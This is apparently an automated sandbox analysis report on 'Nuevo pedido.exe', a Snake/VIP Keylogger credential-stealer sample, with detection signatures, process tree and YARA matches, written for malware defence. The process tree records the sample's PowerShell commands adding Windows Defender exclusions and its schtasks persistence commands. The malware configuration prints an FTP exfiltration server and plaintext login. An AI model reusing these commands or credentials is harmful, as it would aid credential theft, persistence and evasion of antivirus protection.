Edit tour

Windows Analysis Report
Nuevo pedido.exe

Overview

General Information

Sample name:	Nuevo pedido.exe
Analysis ID:	1586800
MD5:	b19a7098f74ce79004ffd6a109302ef0
SHA1:	206ff16596fc022d321df2687440c7942a3c2d4c
SHA256:	1ad584b71b2ebb4fe6418e55f8d261ba662d4ab07e68ff05c1a073580e2419e2
Tags:	exeSnakeKeyloggeruser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses FTP

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Nuevo pedido.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\Nuevo pedido.exe" MD5: B19A7098F74CE79004FFD6A109302EF0)

powershell.exe (PID: 7500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7940 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7596 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Nuevo pedido.exe (PID: 7748 cmdline: "C:\Users\user\Desktop\Nuevo pedido.exe" MD5: B19A7098F74CE79004FFD6A109302EF0)

Nuevo pedido.exe (PID: 7764 cmdline: "C:\Users\user\Desktop\Nuevo pedido.exe" MD5: B19A7098F74CE79004FFD6A109302EF0)

QGVhHsAOjb.exe (PID: 7900 cmdline: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe MD5: B19A7098F74CE79004FFD6A109302EF0)

schtasks.exe (PID: 8072 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp69D7.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

QGVhHsAOjb.exe (PID: 8116 cmdline: "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe" MD5: B19A7098F74CE79004FFD6A109302EF0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "FTP", "Username": "somavip@gdmaduanas.com", "Password": "6JLyf]Kt%D5L", "FTP Server": "ftp://50.31.176.103/"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x742c:$a1: get_encryptedPassword 0x775b:$a2: get_encryptedUsername 0x723c:$a3: get_timePasswordChanged 0x7345:$a4: get_passwordField 0x7442:$a5: set_encryptedPassword 0x8af5:$a7: get_logins 0x8a58:$a10: KeyLoggerEventArgs 0x86bd:$a11: KeyLoggerEventArgsEventHandler
0000000E.00000002.4135978280.000000000043A000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2ee24:$a1: get_encryptedPassword 0x73044:$a1: get_encryptedPassword 0xb7064:$a1: get_encryptedPassword 0x2f153:$a2: get_encryptedUsername 0x73373:$a2: get_encryptedUsername 0xb7393:$a2: get_encryptedUsername 0x2ec34:$a3: get_timePasswordChanged 0x72e54:$a3: get_timePasswordChanged 0xb6e74:$a3: get_timePasswordChanged 0x2ed3d:$a4: get_passwordField 0x72f5d:$a4: get_passwordField 0xb6f7d:$a4: get_passwordField 0x2ee3a:$a5: set_encryptedPassword 0x7305a:$a5: set_encryptedPassword 0xb707a:$a5: set_encryptedPassword 0x304ed:$a7: get_logins 0x7470d:$a7: get_logins 0xb872d:$a7: get_logins 0x30450:$a10: KeyLoggerEventArgs 0x74670:$a10: KeyLoggerEventArgs 0xb8690:$a10: KeyLoggerEventArgs
0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2eb0c:$a1: get_encryptedPassword 0x72d2c:$a1: get_encryptedPassword 0xb6d4c:$a1: get_encryptedPassword 0x2ee3b:$a2: get_encryptedUsername 0x7305b:$a2: get_encryptedUsername 0xb707b:$a2: get_encryptedUsername 0x2e91c:$a3: get_timePasswordChanged 0x72b3c:$a3: get_timePasswordChanged 0xb6b5c:$a3: get_timePasswordChanged 0x2ea25:$a4: get_passwordField 0x72c45:$a4: get_passwordField 0xb6c65:$a4: get_passwordField 0x2eb22:$a5: set_encryptedPassword 0x72d42:$a5: set_encryptedPassword 0xb6d62:$a5: set_encryptedPassword 0x301d5:$a7: get_logins 0x743f5:$a7: get_logins 0xb8415:$a7: get_logins 0x30138:$a10: KeyLoggerEventArgs 0x74358:$a10: KeyLoggerEventArgs 0xb8378:$a10: KeyLoggerEventArgs
Process Memory Space: Nuevo pedido.exe PID: 7288	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Nuevo pedido.exe PID: 7288	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Nuevo pedido.exe PID: 7288	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Nuevo pedido.exe PID: 7288	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Nuevo pedido.exe PID: 7288	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x779e0:$a1: get_encryptedPassword 0x77d0a:$a2: get_encryptedUsername 0x777fa:$a3: get_timePasswordChanged 0x77903:$a4: get_passwordField 0x779f6:$a5: set_encryptedPassword 0x79f07:$a7: get_logins 0x79e6a:$a10: KeyLoggerEventArgs 0x79ad3:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Nuevo pedido.exe PID: 7764	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Nuevo pedido.exe PID: 7764	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Nuevo pedido.exe PID: 7764	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: QGVhHsAOjb.exe PID: 7900	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: QGVhHsAOjb.exe PID: 7900	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: QGVhHsAOjb.exe PID: 7900	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: QGVhHsAOjb.exe PID: 7900	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: QGVhHsAOjb.exe PID: 7900	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x59b38:$a1: get_encryptedPassword 0x59e62:$a2: get_encryptedUsername 0x59952:$a3: get_timePasswordChanged 0x59a5b:$a4: get_passwordField 0x59b4e:$a5: set_encryptedPassword 0x5c05f:$a7: get_logins 0x5bfc2:$a10: KeyLoggerEventArgs 0x5bc2b:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: QGVhHsAOjb.exe PID: 8116	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: QGVhHsAOjb.exe PID: 8116	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: QGVhHsAOjb.exe PID: 8116	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: QGVhHsAOjb.exe PID: 8116	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xc2ff:$a1: get_encryptedPassword 0xc629:$a2: get_encryptedUsername 0xc119:$a3: get_timePasswordChanged 0xc222:$a4: get_passwordField 0xc315:$a5: set_encryptedPassword 0xe826:$a7: get_logins 0xe789:$a10: KeyLoggerEventArgs 0xe3f2:$a11: KeyLoggerEventArgsEventHandler
Click to see the 29 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
14.2.QGVhHsAOjb.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.QGVhHsAOjb.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.2.QGVhHsAOjb.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.QGVhHsAOjb.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.2.QGVhHsAOjb.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e62c:$a1: get_encryptedPassword 0x2e95b:$a2: get_encryptedUsername 0x2e43c:$a3: get_timePasswordChanged 0x2e545:$a4: get_passwordField 0x2e642:$a5: set_encryptedPassword 0x2fcf5:$a7: get_logins 0x2fc58:$a10: KeyLoggerEventArgs 0x2f8bd:$a11: KeyLoggerEventArgsEventHandler
14.2.QGVhHsAOjb.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c540:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3bbe3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3be40:$a4: \Orbitum\User Data\Default\Login Data 0x3c81f:$a5: \Kometa\User Data\Default\Login Data
14.2.QGVhHsAOjb.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f252:$s1: UnHook 0x2f259:$s2: SetHook 0x2f261:$s3: CallNextHook 0x2f26e:$s4: _hook
0.2.Nuevo pedido.exe.395fa18.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Nuevo pedido.exe.395fa18.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Nuevo pedido.exe.395fa18.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Nuevo pedido.exe.395fa18.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c82c:$a1: get_encryptedPassword 0x2cb5b:$a2: get_encryptedUsername 0x2c63c:$a3: get_timePasswordChanged 0x2c745:$a4: get_passwordField 0x2c842:$a5: set_encryptedPassword 0x2def5:$a7: get_logins 0x2de58:$a10: KeyLoggerEventArgs 0x2dabd:$a11: KeyLoggerEventArgsEventHandler
10.2.QGVhHsAOjb.exe.413c4e0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Nuevo pedido.exe.391b7f8.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Nuevo pedido.exe.391b7f8.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Nuevo pedido.exe.391b7f8.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Nuevo pedido.exe.391b7f8.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c82c:$a1: get_encryptedPassword 0x2cb5b:$a2: get_encryptedUsername 0x2c63c:$a3: get_timePasswordChanged 0x2c745:$a4: get_passwordField 0x2c842:$a5: set_encryptedPassword 0x2def5:$a7: get_logins 0x2de58:$a10: KeyLoggerEventArgs 0x2dabd:$a11: KeyLoggerEventArgsEventHandler
0.2.Nuevo pedido.exe.391b7f8.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a740:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39de3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a040:$a4: \Orbitum\User Data\Default\Login Data 0x3aa1f:$a5: \Kometa\User Data\Default\Login Data
10.2.QGVhHsAOjb.exe.4180700.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.QGVhHsAOjb.exe.4180700.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.QGVhHsAOjb.exe.4180700.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Nuevo pedido.exe.391b7f8.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d452:$s1: UnHook 0x2d459:$s2: SetHook 0x2d461:$s3: CallNextHook 0x2d46e:$s4: _hook
0.2.Nuevo pedido.exe.395fa18.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a740:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39de3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a040:$a4: \Orbitum\User Data\Default\Login Data 0x3aa1f:$a5: \Kometa\User Data\Default\Login Data
0.2.Nuevo pedido.exe.395fa18.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d452:$s1: UnHook 0x2d459:$s2: SetHook 0x2d461:$s3: CallNextHook 0x2d46e:$s4: _hook
10.2.QGVhHsAOjb.exe.413c4e0.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.QGVhHsAOjb.exe.413c4e0.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.QGVhHsAOjb.exe.4180700.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c82c:$a1: get_encryptedPassword 0x2cb5b:$a2: get_encryptedUsername 0x2c63c:$a3: get_timePasswordChanged 0x2c745:$a4: get_passwordField 0x2c842:$a5: set_encryptedPassword 0x2def5:$a7: get_logins 0x2de58:$a10: KeyLoggerEventArgs 0x2dabd:$a11: KeyLoggerEventArgsEventHandler
10.2.QGVhHsAOjb.exe.4180700.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a740:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39de3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a040:$a4: \Orbitum\User Data\Default\Login Data 0x3aa1f:$a5: \Kometa\User Data\Default\Login Data
10.2.QGVhHsAOjb.exe.413c4e0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c82c:$a1: get_encryptedPassword 0x2cb5b:$a2: get_encryptedUsername 0x2c63c:$a3: get_timePasswordChanged 0x2c745:$a4: get_passwordField 0x2c842:$a5: set_encryptedPassword 0x2def5:$a7: get_logins 0x2de58:$a10: KeyLoggerEventArgs 0x2dabd:$a11: KeyLoggerEventArgsEventHandler
10.2.QGVhHsAOjb.exe.4180700.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d452:$s1: UnHook 0x2d459:$s2: SetHook 0x2d461:$s3: CallNextHook 0x2d46e:$s4: _hook
10.2.QGVhHsAOjb.exe.413c4e0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a740:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39de3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a040:$a4: \Orbitum\User Data\Default\Login Data 0x3aa1f:$a5: \Kometa\User Data\Default\Login Data
10.2.QGVhHsAOjb.exe.413c4e0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d452:$s1: UnHook 0x2d459:$s2: SetHook 0x2d461:$s3: CallNextHook 0x2d46e:$s4: _hook
0.2.Nuevo pedido.exe.395fa18.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Nuevo pedido.exe.395fa18.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Nuevo pedido.exe.395fa18.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Nuevo pedido.exe.395fa18.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Nuevo pedido.exe.395fa18.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e62c:$a1: get_encryptedPassword 0x7264c:$a1: get_encryptedPassword 0x2e95b:$a2: get_encryptedUsername 0x7297b:$a2: get_encryptedUsername 0x2e43c:$a3: get_timePasswordChanged 0x7245c:$a3: get_timePasswordChanged 0x2e545:$a4: get_passwordField 0x72565:$a4: get_passwordField 0x2e642:$a5: set_encryptedPassword 0x72662:$a5: set_encryptedPassword 0x2fcf5:$a7: get_logins 0x73d15:$a7: get_logins 0x2fc58:$a10: KeyLoggerEventArgs 0x73c78:$a10: KeyLoggerEventArgs 0x2f8bd:$a11: KeyLoggerEventArgsEventHandler 0x738dd:$a11: KeyLoggerEventArgsEventHandler
0.2.Nuevo pedido.exe.395fa18.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c540:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x80560:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3bbe3:$a3: \Google\Chrome\User Data\Default\Login Data 0x7fc03:$a3: \Google\Chrome\User Data\Default\Login Data 0x3be40:$a4: \Orbitum\User Data\Default\Login Data 0x7fe60:$a4: \Orbitum\User Data\Default\Login Data 0x3c81f:$a5: \Kometa\User Data\Default\Login Data 0x8083f:$a5: \Kometa\User Data\Default\Login Data
0.2.Nuevo pedido.exe.395fa18.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f252:$s1: UnHook 0x73272:$s1: UnHook 0x2f259:$s2: SetHook 0x73279:$s2: SetHook 0x2f261:$s3: CallNextHook 0x73281:$s3: CallNextHook 0x2f26e:$s4: _hook 0x7328e:$s4: _hook
10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e62c:$a1: get_encryptedPassword 0x7264c:$a1: get_encryptedPassword 0x2e95b:$a2: get_encryptedUsername 0x7297b:$a2: get_encryptedUsername 0x2e43c:$a3: get_timePasswordChanged 0x7245c:$a3: get_timePasswordChanged 0x2e545:$a4: get_passwordField 0x72565:$a4: get_passwordField 0x2e642:$a5: set_encryptedPassword 0x72662:$a5: set_encryptedPassword 0x2fcf5:$a7: get_logins 0x73d15:$a7: get_logins 0x2fc58:$a10: KeyLoggerEventArgs 0x73c78:$a10: KeyLoggerEventArgs 0x2f8bd:$a11: KeyLoggerEventArgsEventHandler 0x738dd:$a11: KeyLoggerEventArgsEventHandler
10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c540:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x80560:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3bbe3:$a3: \Google\Chrome\User Data\Default\Login Data 0x7fc03:$a3: \Google\Chrome\User Data\Default\Login Data 0x3be40:$a4: \Orbitum\User Data\Default\Login Data 0x7fe60:$a4: \Orbitum\User Data\Default\Login Data 0x3c81f:$a5: \Kometa\User Data\Default\Login Data 0x8083f:$a5: \Kometa\User Data\Default\Login Data
10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f252:$s1: UnHook 0x73272:$s1: UnHook 0x2f259:$s2: SetHook 0x73279:$s2: SetHook 0x2f261:$s3: CallNextHook 0x73281:$s3: CallNextHook 0x2f26e:$s4: _hook 0x7328e:$s4: _hook
10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e62c:$a1: get_encryptedPassword 0x7284c:$a1: get_encryptedPassword 0xb686c:$a1: get_encryptedPassword 0x2e95b:$a2: get_encryptedUsername 0x72b7b:$a2: get_encryptedUsername 0xb6b9b:$a2: get_encryptedUsername 0x2e43c:$a3: get_timePasswordChanged 0x7265c:$a3: get_timePasswordChanged 0xb667c:$a3: get_timePasswordChanged 0x2e545:$a4: get_passwordField 0x72765:$a4: get_passwordField 0xb6785:$a4: get_passwordField 0x2e642:$a5: set_encryptedPassword 0x72862:$a5: set_encryptedPassword 0xb6882:$a5: set_encryptedPassword 0x2fcf5:$a7: get_logins 0x73f15:$a7: get_logins 0xb7f35:$a7: get_logins 0x2fc58:$a10: KeyLoggerEventArgs 0x73e78:$a10: KeyLoggerEventArgs 0xb7e98:$a10: KeyLoggerEventArgs
10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c540:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x80760:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc4780:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3bbe3:$a3: \Google\Chrome\User Data\Default\Login Data 0x7fe03:$a3: \Google\Chrome\User Data\Default\Login Data 0xc3e23:$a3: \Google\Chrome\User Data\Default\Login Data 0x3be40:$a4: \Orbitum\User Data\Default\Login Data 0x80060:$a4: \Orbitum\User Data\Default\Login Data 0xc4080:$a4: \Orbitum\User Data\Default\Login Data 0x3c81f:$a5: \Kometa\User Data\Default\Login Data 0x80a3f:$a5: \Kometa\User Data\Default\Login Data 0xc4a5f:$a5: \Kometa\User Data\Default\Login Data
10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f252:$s1: UnHook 0x73472:$s1: UnHook 0xb7492:$s1: UnHook 0x2f259:$s2: SetHook 0x73479:$s2: SetHook 0xb7499:$s2: SetHook 0x2f261:$s3: CallNextHook 0x73481:$s3: CallNextHook 0xb74a1:$s3: CallNextHook 0x2f26e:$s4: _hook 0x7348e:$s4: _hook 0xb74ae:$s4: _hook
0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
